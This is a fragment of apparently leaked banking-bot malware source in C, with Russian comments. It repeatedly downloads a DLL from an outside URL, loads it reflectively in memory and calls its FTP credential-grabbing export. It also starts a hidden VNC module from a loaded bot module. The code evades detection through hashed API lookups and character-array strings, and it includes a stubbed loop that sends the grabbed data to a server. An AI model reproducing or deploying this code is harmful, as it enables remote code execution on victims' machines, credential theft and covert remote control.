		pReadFile(hFile,BotModule,dwSize,&dwSize,0);
		pCloseHandle(hFile);

		HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );

		if ( hLib == NULL )
		{
			return 0;
		}

		PVNC_Start VNC_Start	 = (PVNC_Start)MemoryGetProcAddress( hLib, "_VNC_Start@0" );

///PVNC_Start VNC_Start	 = (PVNC_Start)GetProcAddress(LoadLibrary(GrabberFile),"_VNC_Start@0");

		VNC_Start();
		while (true) pSleep(1);


		MemoryFreeLibrary( hLib );
		MemFree( BotModule );
		return 1;
	}
	*/
//link.txt
//


	char GrabberFile[] = {"http://apartman-adriana.com/temp/DrClient.dll"/*'/','g','r','a','b','e','r','.','d','l','l',0*/};

	LPVOID BotModule = NULL;

	bool bKnock = false;

	while ( ( BotModule = DownloadPluginFromPath(GrabberFile, NULL ) ) == NULL )
	{
		pSleep( 1000 * 60 * 5 );
	}

	if ( BotModule != NULL  )
	{
		HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );

		if ( hLib == NULL )
		{
			return 0;
		}

		typedef char * ( WINAPI *PFTPGRAB )();

		char GrabFTP[] = {'S','c','a','n','1', 0 };
		char Ole32[]   = {'o','l','e','3','2','.','d','l','l', 0};

		typedef void ( WINAPI *PCoUninitialize )();
		typedef HRESULT ( WINAPI *PCoInitialize )( LPVOID lpReserved );

		PCoUninitialize pCoUninitialize_ = (PCoUninitialize)GetProcAddressEx( Ole32, 0, 0xEDB3159D );
		PCoInitialize   pCoInitialize_   = (PCoInitialize)GetProcAddressEx( Ole32, 0, 0xF341D5CF );

		pCoUninitialize_();
		pCoInitialize_( NULL );

		PFTPGRAB FtpGrabber	 = (PFTPGRAB)MemoryGetProcAddress( hLib, GrabFTP );

		char *Buffer = FtpGrabber();

		DWORD dwSize = m_lstrlen( Buffer );

		if ( dwSize != 0 )
		{
			Buffer[ dwSize ] = '\0';

			bool Sended = false;
			do
			{
				// Отправляем данные на сервер

				Sended = true;
				if (!Sended)
					pSleep( 1000 );

			}
			while (!Sended);
		}

		MemoryFreeLibrary( hLib );

		MemFree( Buffer );
		MemFree( BotModule );


	}